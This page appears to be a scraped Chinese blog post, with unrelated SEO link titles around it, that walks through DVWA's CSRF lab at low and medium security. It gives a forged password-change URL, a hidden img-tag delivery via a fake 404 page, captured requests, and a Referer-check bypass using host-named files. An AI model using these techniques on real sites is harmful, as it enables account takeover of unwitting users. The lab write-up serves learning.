当前位置: 首页 > news >正文

盐山做网站wordpress可视化编辑器插件

盐山做网站,wordpress可视化编辑器插件,小游戏 打开,做网站百度关键排名CSRF 0x01 low 跨站#xff0c;输入密码和确认密码直接写在url中#xff0c;将连接分享给目标#xff0c;点击后修改密码 社工方式让目标点击短链接 伪造404页#xff0c;在图片中写路径为payload#xff0c;目标载入网页自动请求构造链接#xff0c;目标被攻击 http…CSRF 0x01 low 跨站输入密码和确认密码直接写在url中将连接分享给目标点击后修改密码 社工方式让目标点击短链接 伪造404页在图片中写路径为payload目标载入网页自动请求构造链接目标被攻击 http://dvt.dv/learndvwa/vulnerabilities/csrf/?password_new123password_conf123ChangeChange# 观察到url中的修改信息 目标的网站应当处于登录状态才可攻击成功 恶意网页如下尝试攻击 目标访问抓包观察 GET /att/tforc.html HTTP/1.1 Host: dvt.dv Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Cookie: securitymedium; PHPSESSID3ejpptkt8se4a8r4o5vftooj32 Connection: close 第一个包访问页面 GET /learndvwa/vulnerabilities/csrf/?password_newbbbpassword_confbbbChangeChange HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://dvt.dv/att/tforc.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Cookie: securitymedium; PHPSESSID3ejpptkt8se4a8r4o5vftooj32 Connection: close 第二个包请求img标签中的src值 目标的密码被修改利用成功 0x02 medium stripos( $_SERVER[ HTTP_REFERER ] ,$_SERVER[ SERVER_NAME ]) ! false 增加过滤检测请求头中的reffer请求头中的host由$_SERVER[‘SERVER_NAME’]获取。referer中出现host检测为来源自本host才能使用修改密码功能 在referer中出现host的值能通过。虑构造.html文件的文件名为利用网站的host这样能绕过检测。或将.html放在服务器中包含目标host值的目录中 Low级别的图片演示不妥我直接在网站下建个文件夹放恶意.html文件真实情况下这种条件不可能发生 演示命名文件名 GET /noSpecialFilderName/dvt.dv.html HTTP/1.1 Host: attack.at Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 If-None-Match: 11a-615565ab38c9e If-Modified-Since: Fri, 05 Apr 2024 09:48:13 GMT Connection: closeGET /learndvwa/vulnerabilities/csrf/?password_newfilepassword_conffileChangeChange HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://attack.at/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Connection: close 呵呵谷歌给referer作截断 手动修改 GET /learndvwa/vulnerabilities/csrf/?password_newfilepassword_conffileChangeChange HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://attack.at/noSpecialFilderName/dvt.dv.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Connection: close GET /learndvwa/login.php HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://attack.at/noSpecialFilderName/dvt.dv.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Connection: close 后面的包也改一下 不太成不知道为啥XD现代浏览器都不这么干了捏 尝试恶意host GET /learndvwa/vulnerabilities/csrf/?password_newattpassword_confattChangeChange HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://hstnmdvt.dv/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Connection: close 这个包能改成 这个也能成
http://www.hkea.cn/news/14541263/

相关文章:

  • 网站建设网站免费wordpress 不提示更新
  • 做网站怎样和客户沟通辽宁平台网站建设哪里好
  • Oss怎么做静态网站手机在线做ppt的网站有哪些
  • 网站视觉网站设计制作太原
  • 上海微信网站建设做网站的程序员留备份
  • 有专做代金券的网站吗效果图制作网站有哪些
  • 建设电子网站试卷织梦网站图片修改
  • 网站改版多久恢复网站制作案例策划
  • app门户网站长宁集团网站建设
  • 专门做ppt背景的网站有哪些电子拜年贺卡在线制作网站
  • 东莞响应式网站建设定制布吉做棋牌网站建设哪家便宜
  • 开封建网站的公司php企业网站开发源码
  • 网站的功能搜索优化指的是什么
  • 为企业设计网站泰州建站程序
  • 做的网站有广告图片网上接做网站的单子
  • 网站后台建设公司广州联雅网络科技有限公司
  • 如何用用dw做网站后台学网站开发技术
  • 怎么查看网站哪个公司做的装饰公司网站源码
  • 企业建设网站的价值扩展名 网站
  • 免费手机端网站模板下载工具兰州新区农投建设网站
  • 青岛做网站哪个公司好做任务领取礼品的网站
  • 什么是网站微商城的建设html网页制作表格代码
  • 微信h5制作网站开发wordpress文章样式插件
  • 北京网站优化服务商个人如何推广app
  • 保险网站建设公司深圳网站建设制作哪家口碑好
  • 游戏平台网站制作用毛做简单的网站
  • wps免费模板网站山西省建设工程信息网站
  • 网站建设的工作流程规划设计公司网站
  • 织梦婚纱网站模板凡客诚品失败的主要原因
  • 潍坊网站建设公司哪家好哈尔滨市住房和城乡建设局局网站